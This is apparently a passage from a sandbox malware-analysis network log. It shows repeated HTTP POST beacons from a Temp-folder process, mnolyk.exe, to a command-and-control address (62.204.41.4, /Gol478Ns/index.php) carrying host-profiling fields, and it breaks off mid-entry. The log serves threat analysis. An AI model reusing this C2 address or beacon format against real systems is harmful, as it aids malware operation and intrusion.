Feb 7, 2023 20:00:51.268384933 CET	38	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.6	49738	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:55.702188015 CET	125	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:55.765414000 CET	125	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
200	192.168.2.6	49922	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:45.348252058 CET	334	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:45.411358118 CET	334	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
201	192.168.2.6	49923	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:46.547163010 CET	335	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:46.611893892 CET	335	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
202	192.168.2.6	49924	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:46.876099110 CET	336	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:46.940932989 CET	336	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
203	192.168.2.6	49925	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:47.192101002 CET	337	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:47.257828951 CET	337	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
204	192.168.2.6	49926	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:49.382339954 CET	338	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:49.448029041 CET	338	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
205	192.168.2.6	49927	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:49.659609079 CET	339	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:49.723993063 CET	339	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
206	192.168.2.6	49928	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:49.894594908 CET	340	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:49.957206964 CET	340	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
207	192.168.2.6	49929	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:50.134881973 CET	341	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:50.201193094 CET	341	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
208	192.168.2.6	49930	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:50.374172926 CET	342	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:50.436979055 CET	342	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
209	192.168.2.6	49931	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:50.612148046 CET	343	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:50.677005053 CET	343	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.6	49739	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:55.935980082 CET	126	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:55.999777079 CET	126	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
210	192.168.2.6	49932	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:50.862632036 CET	343	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:50.924379110 CET	344	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
211	192.168.2.6	49933	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:51.094137907 CET	345	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:51.158330917 CET	345	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
212	192.168.2.6	49934	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:51.338963032 CET	346	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:51.403808117 CET	346	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
213	192.168.2.6	49935	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:51.579499960 CET	347	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:51.642149925 CET	347	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
214	192.168.2.6	49936	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:51.820245981 CET	348	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:51.883994102 CET	348	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
215	192.168.2.6	49937	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:52.063127041 CET	349	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:52.127693892 CET	349	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
216	192.168.2.6	49938	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:52.305588007 CET	350	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:52.370268106 CET	350	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
217	192.168.2.6	49939	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:52.546117067 CET	351	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:52.609177113 CET	351	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
218	192.168.2.6	49940	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:52.794804096 CET	352	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:52.857938051 CET	352	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
219	192.168.2.6	49941	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
